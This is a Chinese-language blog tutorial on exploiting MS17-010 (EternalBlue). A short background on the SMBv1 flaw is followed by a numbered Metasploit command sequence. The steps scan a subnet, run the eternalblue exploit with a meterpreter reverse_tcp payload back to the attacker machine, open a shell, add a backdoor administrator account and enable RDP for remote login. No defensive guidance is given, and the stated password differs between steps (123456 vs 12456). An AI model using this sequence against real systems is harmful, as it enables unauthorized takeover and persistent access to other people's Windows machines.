MS17-010(Eternal blue永恒之蓝)漏洞利用

永恒之蓝(EternalBlue)是一个用于利用 Microsoft Windows 操作系统 SMB(服务器消息块)协议中的漏洞的攻击工具。该漏洞的编号是 CVE-2017-0144,是由美国国家安全局(NSA)开发并泄漏的一部分。它影响 Windows 的多个版本,并且可以通过网络远程执行代码,导致严重的安全隐患。以下是关于永恒之蓝漏洞的详细介绍及其利用的步骤。

 

永恒之蓝漏洞简介

漏洞描述:EternalBlue 利用 SMBv1 的实现中的一个漏洞,允许攻击者在无身份验证的情况下远程执行代码。

影响范围:Windows 7、Windows Server 2008、Windows Server 2012 等多个版本的 Windows 系统都有可能受到影响。

利用后果:攻击者可以完全控制受影响的系统,执行任意代码,安装软件,查看、更改或删除数据,甚至在网络中传播恶意软件(例如 WannaCry 勒索病毒就是利用了这个漏洞)。

 

 

 

 

 

全部命令

 

1. nmap 192.168.119.0/24 扫描局域网内的C段主机

2. msfconsole 启动

3. use scanner/smb/smb_ms17_010 输入这个模块用来检查目标是否存在永恒之蓝漏洞

4. set rhost 《ip》 这个是输入你要用来检查目标的IP 比如的目标ip是 192.168.119.130 那么正确格式就是 set rhost 192.168.119.130

5. run 这个命令是用来启动检查的 

6. use exploit/windows/smb/ms17_010_eternalblue 如果目标存在永恒之蓝漏洞,使用利用模块

7. set rhosts 192.168.119.130 同样,需要再次设置目标 IP  

8. set payload windows/x64/meterpreter/reverse_tcp 设置可选参数

9. set lhost <你的Kali IP> 设置本地监听地址(你的攻击机 IP)

10. exploit 启动运行利用

11. shell 获取靶机shell

12. chcp 65001 输出乱码就使用chcp 65001因为linux和windows的编码方式不同导致

13. net user bai 123456 /add 提升权限创建新用户 bai是用户名,12456是密码 

14. net localgroup administrators bai /add 将用户添加至管理员群组

15. netstat -ano 查看端口的开启情况看看目标有没有开启3389端口

16. 如果没有请 输入exit退出命令行,在meterpreter中输入run post/windows/manage/enable_rdp 开启3389端口

17. 打开一个新终端,输入rdesktop 192.168.119.130 中途会让确认,输入yes确认 选择其他用户 输入我们刚才新加的用户名和密码 bai是用户名12456是密码 登录成功!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值